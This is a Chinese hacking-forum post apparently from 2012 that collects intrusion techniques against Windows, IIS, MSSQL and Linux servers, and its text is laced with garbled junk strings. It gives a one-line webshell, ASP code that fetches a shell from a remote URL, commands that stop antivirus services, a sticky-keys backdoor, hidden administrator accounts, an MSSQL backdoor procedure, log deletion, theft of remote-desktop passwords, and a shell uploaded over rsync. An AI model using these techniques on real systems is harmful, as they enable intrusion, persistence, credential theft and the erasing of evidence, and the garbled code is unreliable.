中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
1、读网站配置。
2、用以下VBS
3 m% A% d, ?7 L6 n- ^On Error Resume Next
4 a7 F6 d1 S& L' m  P' v! I7 AIf (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
        
9 H6 V2 f$ H7 G/ z
Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "

- v' k0 Y6 Y  z; P% a3 IUsage:Cscript vWeb.vbs",4096,"Lilo"
* y% h% S$ w: s( j- s. H        WScript.Quit
+ m3 h7 o& G- p5 u/ WEnd If
/ B  ]7 u2 T; |! `& b7 gSet ObjService=GetObject
4 T; H, S7 H8 j5 Y- t% Q0 m* |
% M. A! }* E- k) X2 O( E("IIS://LocalHost/W3SVC")
3 t5 W! z: ~: a/ X) K* Z1 eFor Each obj3w In objservice
) I0 X2 R, y$ T% W. b( x        If IsNumeric(obj3w.Name)
1 x0 M+ P: ~' a/ M
Then
                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
         
1 q& e) W! D. |" [  T
       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
                If Err

4 I- g& A' [2 ^/ [, O% B' I<> 0 Then WScript.Quit (1)
& ~" f- T3 B3 u                WScript.Echo Chr(10) & "[" &

OService.ServerComment & "]"
) T6 _3 b$ k9 U  x2 ^                For Each Binds In OService.ServerBindings
     

6 m8 m4 b' x* e9 |4 G                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
8 j$ s% Q: o/ u1 y                        
* N2 k2 m3 F* c7 r  f' c3 n) A
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
0 r7 L9 G( r  V2 r4 @                Next
      

         WScript.Echo "ath            : " & VDirObj.Path
4 A  w+ @1 @9 P        End If
Next
' i  n9 }& Z. l7 i复制代码
3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
% r% {: p2 O  T* A+ H: k8 p9 }0 A4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
—————————————————————
% l  X8 j! T: }. _0 RWordPress的平台，爆绝对路径的方法是：
url/wp-content/plugins/akismet/akismet.php
! _; t4 f) t. u6 D) X) n1 Q, T) C& eurl/wp-content/plugins/akismet/hello.php
0 {; R* z! S, L9 h# Z5 y——————————————————————
% j, o+ r' l0 n) I8 d* uphpMyAdmin暴路径办法:
, }- V, z9 l$ W9 u$ Z8 Y5 M1 u! SphpMyAdmin/libraries/select_lang.lib.php
3 [( v8 B( r1 [% Y& k* H5 u4 f, o, DphpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
# v1 A  s0 q0 n) O7 F& Vphpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
) W4 ]/ F! q% _网站可能目录(注：一般是虚拟主机类）
4 y; s) a$ v$ Bdata/htdocs.网站/网站/
/ j5 X+ n7 q2 _! f————————————————————
4 D) C9 H- @0 \( ICMD下操作VPN相关
netsh ras set user administrator permit #允许administrator拨入该VPN
netsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
netsh ras ip show config #查看VPN分配IP的方式
# J+ P1 R5 m0 e8 ?+ w' H7 w' F1 bnetsh ras ip set addrassign method = pool #使用地址池的方式分配IP
' a& J+ l# u* x: ynetsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
. B2 [: `6 B5 S( P1 Z# P/ D% J( D5 V————————————————————
. k* v- h9 q" d' b# W命令行下添加SQL用户的方法
: c2 O! k4 q3 X& I% l需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
6 U7 ?, @7 K  ^exec master.dbo.sp_addlogin test,123
& I0 B! u1 L; I1 F* G; \4 O, ^" {EXEC sp_addsrvrolemember 'test, 'sysadmin'
6 {9 ^; f1 v  {2 U2 Z1 L% Z然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

另类的加用户方法
在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
js:
var o=new ActiveXObject( "Shell.Users" );
/ S* B" H0 O7 c6 q; R* o$ Q% \z=o.create("test") ;
2 c. c4 ^2 Y% jz.changePassword("123456","")
  f0 h" R" O0 D) Q; I0 {z.setting("AccountType")=3;
* M; h- Y/ p3 Y8 ~3 X$ X6 ]
" `8 o( ?/ W! O6 gvbs:
& L: \) E* P+ o$ ~7 f+ H$ xSet   o=CreateObject( "Shell.Users" )
( C* g2 N9 O1 ASet z=o.create("test")
+ d: R( l0 L1 w. E# b. Z+ Cz.changePassword "123456",""
z.setting("AccountType")=3
——————————————————
cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
7 x% Z+ b6 r0 z
命令如下
7 ]' d5 U% V( w6 q+ ]4 jcacls c: /e /t /g everyone:F           #c盘everyone权限
cacls "目录" /d everyone               #everyone不可读，包括admin
" ?7 S3 u( p8 a) N————————以下配合PR更好————
3389相关
5 O6 C( k. Q4 m6 ya、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
0 O. J( @' O7 n; F! W- pb、内网环境（LCX）
7 _2 _: Z) Z2 h$ x: Tc、终端服务器超出了最大允许连接
& ~0 B8 v- g! h' J7 Q; K6 c& d. z- yXP 运行mstsc /admin
0 z" h5 v  B  I- j3 h2003 运行mstsc /console   

. ~9 e( q. g+ P杀软关闭（把杀软所在的文件的所有权限去掉）
处理变态诺顿企业版：
net stop "Symantec AntiVirus" /y
- V5 j5 |% B# k8 P: `% Enet stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
net stop "Symantec Settings Manager" /y

卖咖啡：net stop "McAfee McShield"
————————————————————
; k8 d$ j6 e# n1 U8 y+ r" S) z
5次SHIFT：
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
2 O% `% h4 V: K# O4 |copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
——————————————————————
隐藏账号添加：
9 a' l9 k" i# }( K) P1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
2、导出注册表SAM下用户的两个键值
3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
7 N: p4 D# ^" _! A4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
MSSQL扩展后门：
/ R/ B3 t- ]- n( rUSE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
3 m/ o$ z3 i# L& W% K' ^$ c) F5 _GRANT exec On xp_helpsystem TO public;
———————————————————————
( w0 U  X- S& N7 n8 w2 O3 l日志处理
2 I+ t$ B) V  Y8 h/ ?. hC:\WINNT\system32\LogFiles\MSFTPSVC1>下有
ex011120.log / ex011121.log / ex011124.log三个文件，
& q, ~3 R6 _; i+ K' G直接删除 ex0111124.log
不成功，“原文件...正在使用”
当然可以直接删除ex011120.log / ex011121.log
3 K* j+ Z3 l! [9 `8 ~1 y  b2 Z用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
当停止msftpsvc服务后可直接删除ex011124.log

& {7 B3 h+ t4 z& H' |+ B  g9 mMSSQL查询分析器连接记录清除：
, y" o( b$ }8 T: ^& r9 S, |MSSQL 2000位于注册表如下：
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
: _* ]+ \- `% `找到接接过的信息删除。
9 d- O+ K1 E# l! c$ h( y* J' tMSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL
6 `: K) }& W5 }0 m  _
9 s& ?: J& A/ S7 ~7 c: E! K/ v" IServer\90\Tools\Shell\mru.dat
$ a9 Q1 r! V0 a; b. d( }, D. n" p—————————————————————————
防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）
+ P2 E, S8 x/ s
4 j  p6 n5 u9 @4 m" V/ g<%
/ h# t$ s! L3 j& g0 \6 ^Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
4 B# o* u0 N9 M5 HDim Ads, Retrieval, GetRemoteData
' s+ f8 n( U* b# M- T- MOn Error Resume Next
8 r0 [3 d& E: l8 eSet Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
. i4 F- [3 H. {/ G.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
+ i; N1 o: N, r0 D! ZGetRemoteData = .ResponseBody
- D+ l' v# q2 T1 {End With
' Z2 b: y6 N8 p+ E0 VSet Retrieval = Nothing
. ~5 p3 m# Z! c3 ^0 ~+ mSet Ads = Server.CreateObject("Adodb.Stream")
With Ads
" @8 M9 p$ c0 h  }.Type = 1
9 }! x- f& a, m% c/ J, a, K" t, I.Open
.Write GetRemoteData
/ ]# o) S& H( O" l+ f5 X.SaveToFile Server.MapPath(s_LocalFileName), 2
! f! a6 ^' x+ V  Z; C.Cancel()
.Close()
End With
Set Ads=nothing
End Sub

eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
%>

VNC提权方法:
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
9 N- e/ h. a1 _( Q, q0 b4 }6 t7 qregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
Radmin 默认端口是4899，
, |  B4 E& z& S2 t) E, \4 oHKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
6 w! h/ m! M8 ?' D5 _7 WHKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
然后用HASH版连接。
* {( Y. F2 }! g, }' Y如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
8 _' C# w- M+ Y; w保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
* X5 K* s4 V9 B# ~Users\Application Data\Symantec\pcAnywhere\文件夹下。
( z5 h% H; Y4 V6 I6 U% B! m——————————————————————
搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
——————————————————----------
0 J; V% j) U/ C8 a' ?WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
2 h/ A3 Y  v' M4 t来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
0 x* ^4 p5 Y3 v" f没有删cmd组建的直接加用户。
' G7 a' \. T+ @0 L/ n  R7i24的web目录也是可写，权限为administrator。

1433 SA点构建注入点。
<%
- b! H, F6 `# }: z+ z4 jstrSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
4 s+ O/ J2 m; u& F3 PstrSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
5 o+ T% ?3 M+ n+ g( [) Y! ]Set conn = Server.createObject("ADODB.Connection")
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &

* u6 t) _& }) v: Z7 ~5 W";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &
; W% X1 {, |# T/ I
strSQLDBName & ";"
9 \( p* F1 D8 y! b; w# s$ Hconn.open strCon
dim rs,strSQL,id
7 k; s  e8 n" ]& E! Fset rs=server.createobject("ADODB.recordset")
id = request("id")
; Z  m  _9 t) X" `strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
1 r$ d1 r5 P: b5 ~. T  v+ {rs.close
%>
复制代码
******liunx 相关******
一.ldap渗透技巧
  n+ W; u( d' q  U& y. N1.cat /etc/nsswitch
+ k/ |0 Y; K! H9 e% R: b看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf
9 ^! w+ G0 _1 c7 Jbase ou=People,dc=unix-center,dc=net
8 R; E& b) x1 c1 m5 |8 O; g找到ou,dc,dc设置
1 z+ C2 B: b' x) X7 j# F, v! u
3.查找管理员信息
% F5 m% m& d) {7 ^% t( s* \' \匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
5 c  b2 J% {- i/ B: ]ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
0 [+ e6 W' v$ w6 L* t! U# w' h- [
' I1 k" P& l8 Q1 \) u"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
* _! H# q0 ^' ?2 H) D

4.查找10条用户记录
8 T  w+ x. l- y0 h# K, gldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

: X( }; a( h4 @实战:
1.cat /etc/nsswitch
9 R) ^# a2 P9 t3 z: S1 Y看看密码登录策略我们可以看到使用了file ldap模式
# f1 K% f/ k  E, N" y" i, s
2.less /etc/ldap.conf
; \/ d- h( ]8 Q3 P' ^base ou=People,dc=unix-center,dc=net
# |: b  R/ h9 v找到ou,dc,dc设置

, N. Q$ f* s  V8 ]1 `5 o! u3.查找管理员信息
: L1 F% ^. ]1 i$ g& c- l匿名方式
/ d3 k; Q7 m4 W) f9 {# c+ k9 mldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
) G2 D! O. h2 u( g3 r
9 |' j) j6 f( S( h, t# [- l. ~"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
% b1 N5 l' @! h* }% V& a
, |* \/ B) y3 P, @! K- l3 V$ y"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

/ w  q9 H  i' B, n, S
0 x1 t/ H! l# v$ t! `2 Z4.查找10条用户记录
. Q) [  m: e! V5 |# ^8 _ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
: o( ^6 S2 o% W0 D  t8 t
渗透实战:
% t  g- p6 O9 t6 P1.返回所有的属性
3 L5 v* K$ w7 z9 ?- b5 Bldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
' O/ i* E( \; B. P$ QobjectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
! P  z; W" P; a# z& w+ j: U. Auid: manager
' {* e- }; \3 W7 N% @. o, X/ bobjectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
/ J1 [1 x! ~9 ^* D$ iobjectClass: top
' j. o0 x9 C7 esn: manager
cn: manager

4 F/ c8 y& p* B' w$ ]9 \2 {dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
6 A' {) y4 k+ ]; r2 `' {: l" N# g9 puid: superadmin
objectClass: inetOrgPerson
4 k( m4 x* B/ M+ OobjectClass: organizationalPerson
objectClass: person
objectClass: top
2 R! b: G$ d5 `sn: superadmin
) U( {0 z% O! `cn: superadmin
4 ?  w4 C! t& }$ j% c# }) Y) U% N0 o
5 N# y1 |+ N* ]8 ~/ m4 F2 j9 ^dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
5 n; W: K( ]" HobjectClass: top
6 Z4 L' b5 M( f; ^/ Z" Tsn: admin
cn: admin

9 l0 X1 W1 Z3 h9 y: b8 Odn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
! X7 O6 T8 Q8 J! ]: U. kuid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
5 u4 I1 e8 P) x4 KobjectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |

( O. ^% [' W/ N5 P4 H; J; `more
3 g" [! }& i( P; E) F; K: c! c' U9 Aversion: 1
* z! k7 o# I" Adn: dc=ruc,dc=edu,dc=cn
4 K, L1 V2 f. b2 @' O: k+ vdc: ruc
9 r5 F5 s" N3 R- `5 q0 I! UobjectClass: domain

1 p4 T/ R/ v7 W3.查找
  ]4 d" u  L7 t3 |bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
# U) ~8 n3 Y0 h0 x$ mdn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
2 j' L! W2 J! f6 T/ S5 @supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
) m9 M& M  d6 zsupportedExtension: 2.16.840.1.113730.3.5.5
/ m! _1 \) n. \, z6 ]supportedExtension: 2.16.840.1.113730.3.5.6
  j. x& v- S; s- s3 K7 H  X# CsupportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
+ K  O$ J* P  Y: ^/ d% L& zsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
1 q+ s5 E; C4 h% ~supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
" K( H# j6 n7 M8 w" CsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
: V7 |' f, a2 JsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
/ l' `3 z" ?; m  [7 C% ysupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
! x6 @) o3 L7 U4 y  V* O; }supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
1 n  P3 I' K$ wsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
, t# M7 ?1 |  x4 C( }2 f1 Z* qsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
8 h! x8 }0 f7 e# G: z) ]; isupportedExtension: 1.3.6.1.4.1.1466.20037
: @1 D- T: O+ ]/ psupportedExtension: 1.3.6.1.4.1.4203.1.11.3
/ B& i: U+ Y$ K# H, |  E1 a% Y5 P7 ~supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
* X* `+ O! v& r  S0 S. |supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
3 b5 q  V* J) [: H5 e5 ?supportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
! ~+ w7 o1 t* T& J8 ssupportedControl: 2.16.840.1.113730.3.4.19
" E- a4 d! j% ?: zsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
1 B7 i" Y2 K# h; bsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
) Q- a2 w7 \% {7 @supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
; I- r+ N9 [9 |7 z# u9 u7 d1 w; `supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
- a; {. H) s  _& i5 }6 j* Q0 {+ qsupportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
; P7 Q1 [+ a$ KvendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
7 I6 N. t  u, X8 g( bsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
+ a! t) u& g, l" ?. n, h/ @+ {7 ~/ wsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
% t. A6 s8 k& @' csupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
$ f2 X4 a9 @: m2 d' _: U9 n* jsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
+ m) k3 j* d7 O4 J; \2 hsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
9 Z7 X: |7 e5 r4 n9 F+ EsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
8 [! l" O( Q& Y8 i) V. HsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
, A6 C% L- m& `: ^' asupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
0 J' ^' W0 r4 [1 X+ c) }6 ~supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
; e3 a' i3 V" y: j  {! h: asupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
! j9 Q7 A8 V3 O4 SsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
  b! k+ S- x  v; fsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
- g9 R: k, u- g+ R7 X. L1 WsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
1 i3 K1 R) A& n+ \2 W2 ysupportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
9 T, Q- V4 s1 i  ^1 J0 r9 A4 ]* zsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
* g0 ?' `: M! m8 h; N( |8 rsupportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
/ R; M2 ~! T. S  @7 lsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
% b5 r) p- m3 C) y1 R. Y9 E! [supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
% W0 \% O- W& F7 k" g" [supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
, l$ w; y0 q, B( F6 @4 h+ ~6 YsupportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
* Q2 K5 g4 }  Y# ~8 S8 QsupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
% s: |$ `/ w$ B2 wsupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
3 y/ Q; l5 j2 d1 o# h0 rsupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
$ V% M/ e# \3 u) I0 |supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
, s0 }& H- C3 U/ u, Q6 }supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
* N5 o5 Y# l6 [1 p/ V' L1 JsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
, o  Z7 R' A' Z/ w( [supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
. n( |. j9 b9 U2 K- OsupportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
: _( n9 t1 Y7 f- R* hsupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
————————————
5 A9 l  t6 p  i( ]5 p) ~8 ~# A2. NFS渗透技巧
showmount -e ip
列举IP
0 I/ L5 L; b6 k8 l8 R——————
/ }2 o. \; H  U3.rsync渗透技巧
1.查看rsync服务器上的列表
rsync 210.51.X.X::
finance
img_finance
auto
+ z9 C. U+ u! ^- @5 v5 Oimg_auto
, M* s% ?0 Q* w, b& w8 ?/ a* C, fhtml_cms
& v: W+ X+ i5 O6 B/ z% Oimg_cms
ent_cms
ent_img
4 D! Q- H; G# ]2 A" {; D5 c0 n( aceshi
" f$ M2 h- O8 }" }0 N$ F! Tres_img
res_img_c2
chip
chip_c2
ent_icms
: M0 V) r7 V6 u" z0 {1 q+ ugames
" _) I3 \1 r6 l5 X4 W9 j8 b. Kgamesimg
media
4 i+ Q5 E3 r2 g5 R9 u- mmediaimg
7 B; i& G$ a# m2 D! e+ \fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
! I* P5 \, V/ `7 ^5 ]res-ent
res-labs
* w" G. F$ d: N) c; s- m/ R1 }res-news
# v- H, P) s/ m: [4 _4 pres-phtv
res-media
home
edu
' W# h& k* f( x9 H9 Znews
5 ~& z1 E2 L: y; I; ures-book

看相应的下级目录(注意一定要在目录后面添加上/)
  G' ^  y1 P- a  z9 h8 o6 ?

rsync 210.51.X.X::htdocs_app/
" I& c  r( i& s$ b" L* S  U+ |rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/
; q5 {+ b/ W8 r4 ?9 J
2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
1 S2 y& \" M9 {3 ?3 j$ u- l
3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
5 z; `' d6 i7 J5 ^3 Z% V) nhttp://app.finance.xxx.com/warn/nothack.txt

四.squid渗透技巧
* r! S& F8 {  z; t# S' }nc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
五.SSH端口转发
0 I6 M8 j% i% U9 z3 q, k+ L; c' tssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

六.joomla渗透小技巧
确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-

15&catid=32:languages&Itemid=47

# \- {! x7 D8 O8 Q/ w7 h) a& ?重新设置密码
index.php?option=com_user&view=reset&layout=confirm

1 Q0 u2 ?2 F9 W1 |: k$ G# ~七: Linux添加UID为0的root用户
( G% A3 o; B( s' Quseradd -o -u 0 nothack
9 |. J. z2 d$ k4 [6 M
' B6 o4 q) z9 [. u6 w8 d, D' h八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
' n3 S' S1 [6 n% d- X2 l# ~, i* [argp@julius ~]$ id
2 j8 E" B, r# F6 ?' K* uid=1001(argp) gid=1001(argp) groups=1001(argp)
% [' S$ l: V$ }) I+ \5 G* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*
5 D9 l* K* O# e9 m& y0 ~+ E) ^9 rcalling nmount()
